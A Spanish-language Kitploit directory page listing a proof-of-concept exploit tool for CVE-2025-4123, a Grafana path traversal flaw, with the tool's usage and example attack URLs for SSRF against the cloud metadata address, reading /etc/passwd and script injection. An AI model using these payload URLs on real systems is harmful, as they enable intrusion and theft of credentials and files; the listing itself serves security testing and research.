Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/ynsmroztas/cve-2025-4123-exploit-tool-grafana-
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubynsmroztas/cve-2025-4123-exploit-tool-grafana-

CVE-2025-4123-Exploit-Tool-Grafana-

CVE-2025-4123 - Herramienta de Grafana

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
326hace 1 añoRevisado por Kitploit

CVE-2025-4123 - Exploit de Path Traversal en Grafana

Desarrollado por mitsec

Esta es una herramienta de explotación de prueba de concepto (PoC) para CVE-2025-4123, una vulnerabilidad crítica de path traversal en el endpoint /public de Grafana. El exploit permite:

  • ✅ Server-Side Request Forgery (SSRF)
  • ✅ Local File Inclusion (LFI)
  • ✅ Open Redirect
  • ✅ Cross-Site Scripting (XSS)

🔥 Afectado

Instancias de Grafana con el endpoint /public/ que manejan incorrectamente rutas codificadas como:

root@kitploit:~
/public/..%2F%5coast.pro%2F%3f%2F..%2F..

🚀 Uso

root@kitploit:~
python3 cve_2025_4123_exploit_mitsec_final.py

Luego selecciona el modo deseado:

  1. SSRF - Servicios internos como 169.254.169.254
  2. LFI - Leer archivos como /etc/passwd
  3. Open Redirect - Redirigir a dominios externos
  4. XSS - Inyección de JavaScript en la ruta pública

🧪 Ejemplo

root@kitploit:~
[*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[*] LFI URL:  http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
[*] XSS URL:  http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E

📄 Descargo de responsabilidad

Este código se proporciona únicamente con fines educativos y de pruebas autorizadas. El uso no autorizado contra sistemas sin consentimiento es ilegal.


✍️ Autor

  • mitsec
Descargar herramienta